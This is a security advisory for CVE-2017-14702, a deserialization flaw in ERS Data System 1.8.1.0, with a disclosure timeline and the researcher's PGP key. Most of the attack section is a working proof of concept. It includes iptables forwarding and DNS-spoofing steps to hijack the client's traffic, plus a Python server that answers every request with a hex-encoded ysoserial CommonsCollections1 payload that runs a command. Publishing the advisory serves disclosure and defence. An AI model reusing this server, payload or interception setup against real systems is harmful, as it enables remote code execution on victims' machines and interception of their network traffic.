Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
185 lines (158 sloc) 13.3 KB

CVE-2017-14702

Description

ERS Data System 1.8.1.0 / 4.0 allows remote attackers to execute arbitrary code, related to the use of the com.branaghgroup.ecers.update.UpdateRequest" objects deserialization.

VulnerabilityType

Deserialization of Untrusted Data (CWE-502)

Vendor of Product

Environment Rating Scale (ERS), Branagh Information Group, Inc.

Affected Product Code Base

ERS Data System - 1.8.1.0

Affected Component

Component Hash
ecers_3.03.jar 1b1758051d501fe610148e8b19b96825
commons-collections_3.2.jar 7b9216b608d550787bdf43a63d88bf3b
ecers_3.65.jar b80fc66fa94b6dafa34a024577f12671

Attack Type

Remote

Impact Code execution

true

Attack Vectors

Attackers can exploit this vulnerability by responding to the ERS thick clients HTTP requests with malicious serialized Java objects. The vulnerability can be triggered during the authentication of the thick client, or subsequent requests to the ERS web service.

Reference

Product Website
Product Download

Discoverer

West Shepherd
wshepherd0010[at]gmail.com

Advisory ID

CVE-2017-14702.

Report Timeline

Date Action
9/21/2017 Submitted CVE ID request to MITRE via web form, received email confirming submission.
9/22/2017 Received response from MITRE CVE assignment team, CVE ID reserved.
9/25/2017 Contacted vendor via contact form on website, no reply.
9/27/2017 Contacted vendor CEO via email offering to work with their development team to remediate the issue at no cost, no reply.
9/29/2017 Released advisory publicly without exploit code to allow vendor time to fix the issue.
10/3/2017 No contact from vendor. Released exploit code to validate vulnerability.
1/4/2018 Coordinated with vendor for follow up assessment on updated code.
1/17/2018 Contacted vendor via email with report on findings.

PoC

Exploit code publication pending on exploit-db.

# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702

# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of 
# com.branaghgroup.ecers.update.UpdateRequest deserialization.

# Exploitaiton:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311. 
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:

#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT

# Then poison DNS requests to the www.ersdata.com domain:

# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.

# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example:

#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler

# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):		
	def __init__(self,req,client_addr,server):
		SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)	
	def do_POST(self):
		# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
		# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
		response = (	"\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"		
		)
		self.send_response(200)
		self.send_header("Content-type", "text/html")
		self.send_header("Content-length", len(response))
		self.end_headers()
		self.wfile.write(response)		
try:		
	httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
	print "Serving at port: ", 3311
	httpd.serve_forever()	
except:
	print "Exiting..."

PGP

Contact West Shepherd wshepherd0010[at]gmail.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: CryptUp 4.4.6 Gmail Encryption https://cryptup.org
Comment: Seamlessly send, receive and search encrypted email

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
6/I9
=vCq5
-----END PGP PUBLIC KEY BLOCK-----